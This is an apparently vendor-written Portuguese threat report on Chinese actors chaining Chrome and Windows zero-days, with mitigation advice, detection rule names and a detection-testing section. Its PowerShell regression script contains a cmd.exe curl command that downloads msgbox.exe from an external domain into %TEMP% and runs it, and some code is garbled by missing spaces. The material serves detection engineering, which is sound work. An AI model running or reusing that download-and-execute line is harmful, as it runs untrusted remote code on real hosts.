Agentes de Ameaças Chinesas Encadeiam Vulnerabilidades Dia-Zero em Navegadores e Windows
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Dois atores de ameaça chineses, UTA0560 e JungleBamboo, estão usando uma sofisticada cadeia de exploração em múltiplas etapas que tem como alvo o Google Chrome e o kernel do Windows. Os ataques aproveitam uma janela de patch-gap em que vulnerabilidades são corrigidas no Chromium antes que as atualizações correspondentes cheguem às versões lançadas do Google Chrome. Lures de spear-phishing entregam diferentes cargas úteis, incluindo o backdoor JScript GRIMWEDGE e a extensão do Chrome LONGTALE.
Investigação
O Monitoramento de Segurança de Rede da Volexity identificou uma campanha de spear-phishing visando ONGs em 1º de setembro de 2026. A investigação descobriu uma cadeia de exploração compartilhada envolvendo CVE-2026-85046, CVE-2026-87491 e CVE-2026-85880. Os analistas separaram a atividade em dois clusters: UTA0560 implantando o GRIMWEDGE e JungleBamboo usando o SUPERSTOMP para instalar a extensão LONGTALE.
Mitigação
As organizações devem manter o Google Chrome atualizado para a versão mais recente disponível para reduzir a exposição durante os períodos de patch-gap. As equipes de segurança devem monitorar comportamentos incomuns de processos filhos do Chrome e instalações não autorizadas de extensões do Chrome. Filtragem de e-mail forte para lures de spear-phishing e monitoramento da criação de tarefas agendadas suspeitas ou não autorizadas também são recomendados.
Resposta
Se a exploração for detectada, os hosts afetados devem ser isolados imediatamente para prevenir mais comunicações de comando e controle ou movimento lateral. Os respondedores devem realizar análises forenses de memória nos processos do Chrome para identificar shellcode injetado. As extensões do Chrome instaladas também devem ser auditadas e as tarefas agendadas revisadas para encontrar entradas suspeitas, como Sistema de Agendamento do Windows.
Fluxo de Ataque
Ainda estamos atualizando esta parte.
Detecções
Uso Suspeito de CURL (via linha de comando)
Comando e Controle Suspeito por Requisição de DNS de Domínio de Nível Superior (TLD) Incomum (via dns)
Tarefa Agendada Suspeita (via auditoria)
IOCs (HashSha256) para detectar: Atenção à Lacuna (Patch) – Atores de Ameaça Chineses Cadeiam Explorações de Dia Zero no Chrome & Windows
IOCs (SourceIP) para detectar: Atenção à Lacuna (Patch) – Atores de Ameaça Chineses Cadeiam Explorações de Dia Zero no Chrome & Windows
IOCs (DestinationIP) para detectar: Atenção à Lacuna (Patch) – Atores de Ameaça Chineses Cadeiam Explorações de Dia Zero no Chrome & Windows
Páginas de Landing da Cadeia de Exploração de Dia Zero do Chrome [Servidor Web]
Detecção de Atividade Backdoor GRIMWEDGE JScript e Entrega de Carga Útil [Criação de Processo no Windows]
Execução de Simulação
-
Narrativa & Comandos do Ataque: O adversário busca estabelecer uma presença no sistema comprometido implantando o backdoor GRIMWEDGE JScript. Para evitar detecção por verificação anti-vírus baseada em assinatura simples, o atacante utiliza
cmd.exee a ferramenta nativacurlpara baixar um carregador de segunda etapa nomeadomsgbox.exede uma infraestrutura de comando e controle (C2) remota. Uma vez que o download é concluído, o atacante executa imediatamente a carga útil do%TEMP%diretório para minimizar o tempo que o arquivo passa no disco e para explorar um diretório frequentemente negligenciado por monitoramento básico. Esta sequência é projetada para corresponder ao padrão específico de linha de comando que a regra de detecção está procurando. -
Script de Teste de Regressão:
# Script de simulação para acionar a regra de detecção GRIMWEDGE. # Este script cria um arquivo fictício para simular a carga útil baixada. $tempDir = $env:TEMP $payloadName = "msgbox.exe" $payloadPath = Join-Path $tempDir $payloadName # 1. Crie um 'msgbox.exe' fictício para simular a carga útil baixada # Em um ataque real, este seria o binário malicioso real. New-Item -Path $payloadPath -ItemType File -Force Set-Content -Path $payloadPath -Value "Conteúdo de Carga Útil Fictício" # 2. Execute a string de comando exata identificada na lógica de detecção. # Nota: Usamos uma abordagem local de echo/mock para a URL para garantir que a string de comando corresponda exatamente. cmd.exe /c "curl -f -sS -o ""$tempDirmsgbox.exe"" ""https://cloud.shinewrist.net/test/msgbox.exe"" && ""$tempDirmsgbox.exe""" Write-Host "Simulação concluída. Verifique o SIEM para alertas correspondentes ao padrão GRIMWEDGE." -
Comandos de Limpeza:
# Script de limpeza para remover a carga útil e os arquivos simulados. $tempDir = $env:TEMP $payloadPath = Join-Path $tempDir "msgbox.exe" if (Test-Path $payloadPath) { Remove-Item -Path $payloadPath -Force Write-Host "Limpeza bem-sucedida: $payloadPath removido." } else { Write-Host "Carga útil não encontrada. Limpeza desnecessária." }